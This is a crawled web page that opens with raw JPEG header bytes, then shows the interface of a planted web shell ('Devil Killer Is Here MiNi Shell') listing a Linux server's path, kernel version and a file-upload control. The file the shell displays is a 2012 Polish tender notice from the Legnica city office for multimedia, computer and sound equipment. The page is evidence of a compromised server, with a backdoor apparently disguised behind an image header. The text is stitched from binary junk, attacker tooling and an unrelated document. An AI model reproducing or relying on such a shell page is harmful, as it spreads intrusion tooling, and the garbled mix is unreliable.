JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121114/450696-N-2012.html

<p class="kh_header"><b>Legnica: Dostawa wraz z montażem wyposażenia pomieszczeń w sprzęt multimedialny, komputery, RTV 
i instrumenty w ramach zadania inwestycyjnego pn. Odnowa zdegradowanych obszarów miejskich w rejonie ul. H. Pobożnego - przebudowa (adaptacja) Willi Bolka von Richthofena 
wraz z zagospodarowaniem terenu na potrzeby Środowiskowego Centrum Integracyjno - Profilaktycznego - współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego</b><br>
<b>Numer ogłoszenia: 450696 - 2012; data zamieszczenia: 14.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Legnicy , pl. Słowiański 8, 59-220 Legnica, woj. dolnośląskie, tel. 076 7212100, faks 076 7212115.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.legnica.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem wyposażenia pomieszczeń w sprzęt multimedialny, komputery, RTV 
i instrumenty w ramach zadania inwestycyjnego pn. Odnowa zdegradowanych obszarów miejskich w rejonie ul. H. Pobożnego - przebudowa (adaptacja) Willi Bolka von Richthofena 
wraz z zagospodarowaniem terenu na potrzeby Środowiskowego Centrum Integracyjno - Profilaktycznego - współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa wraz z montażem wyposażenia pomieszczeń w sprzęt multimedialny, komputery, RTV i instrumenty jak niżej :

Część nr 1 - sprzęt multimedialny, komputery, RTV:
I A. SPECYFIKACJA WYPOSAŻENIA POMIESZCZEŃ filii Poradni Psychologiczno - Pedagogicznej nr 2  w Środowiskowym Centrum Integracyjno - Profilaktycznym
Sala do zajęć grupowych:
1. Zestaw kina domowego -  1 sztuka
2. Projektor multimedialny z uchwytem sufitowym - 1 sztuka
3. Ekran stacjonarny, zwijany elektrycznie - 1 sztuka
4. Telewizor LCD - 1 sztuka
5. Tablet PC Touch Box 7.Spark Czarny lub nie o gorszych parametrach - 1 sztuka
6. Komputer przenośny - laptop - 1 sztuka
Pokój biurowy - sekretariat:
7. Zestawy komputerowe z oprogramowaniem - 2 zestawy
8. Kopiarka - 1 sztuka
9. Drukarka laserowa - 1 sztuka
10. Niszczarka - 1 sztuka
11. Fax- 1 sztuka
Gabinet psychologa:
12. Zestaw komputerowy z oprogramowaniem - 1 zestaw
Gabinet doradztwa zawodowego:
13. Zestaw komputerowy z oprogramowaniem - 1 zestaw
14. Zestawy komputerowe z oprogramowaniem. Stanowiska do badań - 2 zestawy
Gabinet terapii logopedycznej i pedagogicznej
15. Zestaw komputerowy z oprogramowaniem - 1 zestaw
16. Radiomagnetofon - 1 sztuka
Gabinet socjologa i informatyka:
17. Zestawy komputerowe z oprogramowaniem - 2 zestawy
Gabinet  do artterapii i relaksacji:
18. Radiomagnetofon z CD i MP3, port USB - 1 sztuka

II.A. SPECYFIKACJA WYPOSAŻENIA POMIESZCZEŃ ORGANIZACJI POZARZĄDOWEJ w Środowiskowym Centrum Integracyjno - Profilaktycznym:
Świetlica -sala do zajęć grupowych:
1.Ekran stacjonarny, zwijany elektrycznie - 1 sztuka
2.Projektor multimedialny z uchwytem sufitowym - 1 sztuka
3.Komputer przenośny z oprogramowaniem - 1 sztuka
4.Telewizor LCD 40-42 cali- 1 sztuka
5.Zestaw kina domowego - 1 sztuka
6.Wieża MP3 - 1 sztuka
7.Zestawy komputerowe z oprogramowaniem - 4 zestawy
8.Urządzenie wielofunkcyjne Drukarka laserowa, skaner kopiarka - 1 sztuka
9.Fax- 1 sztuka
10. Drukarka laserowa, Skaner, Kserokopiarka - 1 komplet
11. Niszczarka dokumentów - 1 sztuka
12. Aparat telefoniczny 2-słuchawkowy - 1 sztuka
13. Zestaw Komputerowy z oprogramowaniem - 1 zestaw
według opisu  przedmiotu zamówienia wg załącznika nr 6  do Instrukcji dla Wykonawców - Rozdział 2 siwz
  

Część nr 2-  instrumenty (sprzęt nagłaśniający):
1 B. SPECYFIKACJA WYPOSAŻENIA POMIESZCZEŃ filii Poradni Psychologiczno - Pedagogicznej nr 2  w Środowiskowym Centrum Integracyjno - Profilaktycznym
Sala do zajęć grupowych:
1. Mikrofon  + kolumna z akumulatorem - 1 zestaw
Gabinet terapii logopedycznej i pedagogicznej:
2. Zestaw instrumentów perkusyjnych ZESTAW EDUKACYJNY - 1 zestaw


II.B.SPECYFIKACJA WYPOSAŻENIA POMIESZCZEŃ ORGANIZACJI POZARZĄDOWEJ  w Środowiskowym Centrum Integracyjno - Profilaktycznym:
Świetlica -sala do zajęć grupowych:
3. Mikrofon bezprzewodowy - 1 zestaw
4. Pianino cyfrowe ze statywem i trzema pedałami - 1 zestaw
5. Sprzęt nagłaśniający: Mikser, 2 mikrofony bezprzewodowe, 2 statywy mikrofonowe, 2 kolumny,
2 statywy, 2 kable - 1 zestaw.
według opisu  przedmiotu zamówienia wg załącznika nr 7  do Instrukcji dla Wykonawców - Rozdział 2 siwz

Opis przedmiotu zamówienia ( część 1 lub część 2) zgodnie z załącznikami nr 6 lub 7 i  8 lub 9  do Instrukcji dla Wykonawców - Rozdział 2 specyfikacji istotnych warunków zamówienia (siwz).
          
III.
1) Przed przystąpieniem do realizacji zamówienia Wykonawca zobowiązany jest przedstawić Zamawiającemu dane techniczne proponowanych urządzeń oraz dokonać pomiarów sprawdzających w pomieszczeniach, dopasować wymiary elementów wyposażenia do istniejących pomieszczeń oraz  sporządzić projekt aranżacji wnętrz.. Do realizacji zamówienia Wykonawca może przystąpić po dokonaniu akceptacji przez Zamawiającego  przedstawionych propozycji sprzętu. 
2) Wszystkie oferowane towary muszą być fabryczne nowe, nieregenerowane, wolne od wad fizycznych i zobowiązań prawnych, nie mają do nich praw osoby trzecie oraz nie są  przedmiotem żadnego postępowania i zabezpieczenia. 
3) Towary będące przedmiotem zamówienia winny być odpowiednio oznaczone i posiadać wszelkie dokumenty określone szczegółowymi przepisami dotyczącymi trybu dopuszczenia ich do stosowania, takie jak: np. certyfikaty zgodności z normami lub aprobatami technicznymi, atesty, świadectwa PZH itp.
4) Wszelkie prace montażowe i instalacyjne winny być prowadzone pod nadzorem osób posiadających stosowną wiedzę i umiejętności. 
         
IV.
1) Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie- należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o parametrach technicznych, eksploatacyjnych i użytkowych takich samych bądź lepszych w stosunku do oryginału produktu producenta.
2) Zgodnie z treścią  art. 29 ust 3 ustawy Prawo zamówień publicznych z dnia 29.01.2004r. (Dz. U. z 2010r. nr 113, poz. 759 - ze zmianami)  jeżeli w opisie przedmiotu zamówienia wskazane są konkretne rozwiązania pod względem cech, parametrów technicznych, eksploatacyjnych oraz użytkowych,  Zamawiający dopuszcza zastosowanie rozwiązań równoważnych, co do ich  cech, parametrów technicznych, eksploatacyjnych oraz użytkowych, a wszystkie ewentualne nazwy firmowe towarów użyte w opisie przedmiotu zamówienia powinny być traktowane jako definicje standardowe, a nie konkretne  nazwy firmowe towarów zastosowanych- określonych w specyfikacji istotnych warunków zamówienia. 
3) Obowiązek udowodnienia równoważności leży po stronie Wykonawcy zgodnie z art. 30  ust 5 ww. ustawy Pzp - poprzez załączenie do oferty opisu w załączniku nr 6 lub 7 (w kolumnie nr 5) oraz np. katalogów, opisów producenta, wydruków ze strony internetowej itp.- czyli opisów, które  w sposób nie budzący wątpliwości Zamawiającego będą potwierdzały równoważność  towaru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6, 32.32.12.00-1, 30.23.60.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2.000,- PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają  poniższy warunek udziału w postępowaniu:
Posiadania wiedzy i doświadczenia tj. jako Wykonawca wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 1 zamówienie obejmujące
- dla części nr  1: dostawę sprzętu biurowego obejmującą: zestawy komputerowe, drukarki, fax-y o wartości min. 20.000,- zł brutto - z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane lub są wykonywane  należycie np. referencje Odbiorców, protokoły zdawczo-odbiorcze, zawarta umowa  itp.
- dla części nr  2: dostawę sprzętu nagłaśniającego obejmującą:  mikser,  mikrofony bezprzewodowe, statywy mikrofonowe, kolumny o wartości min. 10.000,- zł brutto - z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane lub są wykonywane  należycie np. referencje Odbiorców, protokoły zdawczo-odbiorcze, zawarta umowa itp.
            
Ocena spełnienia warunku według :
a)  oświadczenia Wykonawcy- załącznik nr 1 do Instrukcji dla Wykonawców - Rozdział 2 siwz.      
b) wykazu do każdej części na którą składana jest oferta wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, - z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane lub są wykonywane  należycie  np. referencje Odbiorców, protokoły zdawczo-odbiorcze, zawarta umowa itp. -  wzór załącznik nr 3 do Instrukcji dla Wykonawców - Rozdział 2 siwz + dokumenty potwierdzające,  że  dostawa  została wykonana lub jest wykonywana  należycie.     

Ocena spełnienia w/w warunku dokonana zostanie  zgodnie z formułą  spełnia/nie  spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">opisy lub fotografie np. katalogi, opisy producenta, wydruki ze strony internetowej itp. przy zastosowaniu produktów równoważnych</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty wg załączonego wzoru  Rozdziału  Nr 1 specyfikacji istotnych warunków zamówienia.
2.   Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu z art. 22 ust.1 ustawy Pzp wg wzoru załącznika nr 1 do Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia.
3. Oświadczenie Wykonawcy - wskazanie części zamówienia, której wykonanie powierzy podwykonawcom - wg wzoru załącznika nr 4 do Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia.
4. Oświadczenie Wykonawcy na przyjęcie warunków zmian w umowie - wg załącznika nr 5
do Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia.
5.  Wypełniony WYKAZ CEN   - wg załącznika nr 8 lub 9 ( w przypadku składania oferty 
na część nr 1 lub część nr 2) i wg. załącznika nr 8 i 9 ( w przypadku składania oferty na część 
nr 1 i część nr 2) do Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia..
6.  Oświadczenia Wykonawcy dotyczące towarów-przedmiotu zamówienia- wg załącznika nr 10 Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia..
7. Karta gwarancyjna - wg załącznika nr 11 do Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia..
8.  Wypełnioną umowę  wg Rozdziału Nr  3 -  wypełnienie  i  akceptacja   umowy  nie  stanowi zobowiązań   prawnych ze strony Zamawiającego.
9. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia pełnomocnictwo, w którym Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanowią i wskażą Zamawiającemu pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowanie w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego. Pełnomocnictwo będzie podpisane przez osoby upoważnione do reprezentowania i podpisywania oświadczeń w imieniu Wykonawców zgodnie z dokumentami rejestracyjnymi. W przypadku niezgodności wpisu ze stanem faktycznym Wykonawcy każdy Wykonawca musi złożyć dokumenty sporządzone przez jego właściwy organ, a uprawniający daną osobę lub osoby 
do reprezentowania Wykonawcy i podpisywania oświadczeń w imieniu Wykonawców.
10. W sytuacji gdy Wykonawca, zgodnie z art. 26  ust 2b w zakresie warunków określonych w pkt. 13 Instrukcji dla Wykonawców- Rozdział Nr 2 specyfikacji istotnych warunków zamówienia, polegał będzie na wiedzy i doświadczeniu podmiotów, niezależnie od charakteru  prawnego łączących go z nim stosunków, pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji  niezbędnych zasobów na okres korzystania  z nich przy wykonaniu zamówienia.
11.   Dowód wpłacenia/wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami załącznika WARUNKI ZMIAN W UMOWIE - załącznik nr 5 do Instrukcji dla Wykonawców- Rozdział 2 siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.legnica.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Legnica, Plac Słowiański 7 , pokój nr 22- Referat Zamówień  Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2012 godzina 13:00, miejsce: Urząd Miasta Legnica, Plac Słowiański 8 , pokój nr 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Odnowa zdegradowanych obszarów miejskich w rejonie ul. H. Pobożnego - przebudowa (adaptacja) Willi Bolka von Richthofena wraz z zagospodarowaniem terenu na potrzeby Środowiskowego Centrum Integracyjno - Profilaktycznego-  współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego  na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr 1 - sprzęt multimedialny, komputery, RTV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1 - sprzęt multimedialny, komputery, RTV:
I A. SPECYFIKACJA WYPOSAŻENIA POMIESZCZEŃ filii Poradni Psychologiczno - Pedagogicznej nr 2  w Środowiskowym Centrum Integracyjno - Profilaktycznym
Sala do zajęć grupowych:
1. Zestaw kina domowego -  1 sztuka
2. Projektor multimedialny z uchwytem sufitowym - 1 sztuka
3. Ekran stacjonarny, zwijany elektrycznie - 1 sztuka
4. Telewizor LCD - 1 sztuka
5. Tablet PC Touch Box 7.Spark Czarny lub nie o gorszych parametrach - 1 sztuka
6. Komputer przenośny - laptop - 1 sztuka
Pokój biurowy - sekretariat:
7. Zestawy komputerowe z oprogramowaniem - 2 zestawy
8. Kopiarka - 1 sztuka
9. Drukarka laserowa - 1 sztuka
10. Niszczarka - 1 sztuka
11. Fax- 1 sztuka
Gabinet psychologa:
12. Zestaw komputerowy z oprogramowaniem - 1 zestaw
Gabinet doradztwa zawodowego:
13. Zestaw komputerowy z oprogramowaniem - 1 zestaw
14. Zestawy komputerowe z oprogramowaniem. Stanowiska do badań - 2 zestawy
Gabinet terapii logopedycznej i pedagogicznej
15. Zestaw komputerowy z oprogramowaniem - 1 zestaw
16. Radiomagnetofon - 1 sztuka
Gabinet socjologa i informatyka:
17. Zestawy komputerowe z oprogramowaniem - 2 zestawy
Gabinet  do artterapii i relaksacji:
18. Radiomagnetofon z CD i MP3, port USB - 1 sztuka

II.A. SPECYFIKACJA WYPOSAŻENIA POMIESZCZEŃ ORGANIZACJI POZARZĄDOWEJ w Środowiskowym Centrum Integracyjno - Profilaktycznym:
Świetlica -sala do zajęć grupowych:
1.Ekran stacjonarny, zwijany elektrycznie - 1 sztuka
2.Projektor multimedialny z uchwytem sufitowym - 1 sztuka
3.Komputer przenośny z oprogramowaniem - 1 sztuka
4.Telewizor LCD 40-4 cali- 1 sztuka
5.Zestaw kina domowego - 1 sztuka
6.Wieża MP3 - 1 sztuka
7.Zestawy komputerowe z oprogramowaniem - 4 zestawy
8.Urządzenie wielofunkcyjne Drukarka laserowa, skaner kopiarka - 1 sztuka
9.Fax- 1 sztuka
10. Drukarka laserowa, Skaner, Kserokopiarka - 1 komplet
 11. Niszczarka dokumentów - 1 sztuka
